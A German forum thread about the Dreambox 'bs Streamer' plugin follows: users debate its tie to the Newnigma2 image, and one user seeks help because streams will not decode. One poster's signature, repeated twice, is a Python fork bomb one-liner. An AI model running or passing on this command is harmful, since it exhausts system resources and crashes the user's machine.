bs Streamer v0.4 *OE 2.0 only*

  • Originally posted by dirtylion
    das plugin ist einer der vorzüge wenn man ein newnigma2 oe 2.0 image installiert hat !


    Das impliziert irgendwie das ein newnigma image grundsätzlich nötig wäre um dieses plugin nutzen zu können.
    Es nutzbar zu machen ist aber eine entscheidung,die darauf beruht ein bestimmtes image zu pushen und nicht eine entscheidung die auf technischer machbarkeit beruht.
    Sicher ist es deine entscheidung was du mit deinen plugins machst und ich möchte mich hier auch nicht zu sehr reinhängen,da du ansonsten ja schon sehr viel der öffentlichkeit zur verfügung stellst.
    Ich muss aber sagen das ich diese einstellung doch sehr schade finde.
    Ich finde die user sollten doch einfach ihre wahl treffen können,welches image sie nutzen wollen und es sollte ihnen nicht erzählt werden das es bestimmte funktionen eben nur mit bestimmten images gibt,oder das sie nur mit bestimmten images möglich wären.
    Da gibt es natürlich auch einschränkungen bei funktionen die nicht über plugins(wie dieses hier) gelöst werden können.
    Dieses gruppendenken ist aber in jeder hinsicht negativ und das gilt hier natürlich genauso,wie bei dem gemini plugin.
    (Falls jetzt jemand sagen wollte,das es da ja auch nicht anderes gehandhabt wird).
    Es gibt dort aber wenigstens den unterschied das man das gemini plugin auf dem newnigma installieren kann,nicht aber dieses plugin hier auf anderen images neben dem newnigma(zumindest nicht ohne weiteres).

    Ps.Spreche hier nicht pro gemini,denn ich nutze das gemini plugin genauso wenig wie das newnigma image.
    “If you think this has a happy ending, you haven't been paying attention.”
  • der thread ist für sowas nicht vorgesehen..

    Schlusswort:
    Jeder kann frei entscheiden welches image man(n) sich flasht, jedes image hat seine vor und nachteile !
    Du brauchst hilfe ?? !!
    JOIN unseren irc channel #newnigma2 @ irc0.brn.ch.swissirc.net

    Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von dirtylion ()

  • Originally posted by dirtylion
    der thread ist für sowas nicht vorgesehen..

    Schlusswort:
    Jeder kann frei entscheiden welches image man(n) sich flasht, jedes image hat seine vor und nachteile !


    *zustimm*
    Das plugin läuft hier übrigends sehr gut.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Ich habe jetzt das Plugin vom Feed installiert. v.0.1
    Ich bekomme aber die Meldung:
    Diese Dreambox kann Streams nicht dekodieren.
    Was muss ich noch installieren bzw. bei meiner Box einstellen?
    Bitte um Hilfe. ?(
    Gruß Rabevater

    Dreambox HD8000ss
    Newnigma2 aktuelles unstable OE2.0 alpha
    Skin dreamTV-HD
  • Originally posted by ernaa
    Also mehr wie installieren geht nicht.

    PHP-Quellcode

    1. Package gst-plugins-good-flv (0.10.31-r1-dream2) installed in flash is up to date


    Tja ich habs installiert und es geht tadellos irgendwas machst du anders sonst würde das gehen.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Es nutzt ja nix. Was könnte man da anders machen?
    Wahrscheinlich nichts!
    --------------------
    Burning Plugin
    gst Plugin
    --------------
    Installieren und Box neu booten!


    Es läuft nicht!
    Bilder
    • screenshotkk.jpg

      75,8 kB, 720×405, 2.721 mal angesehen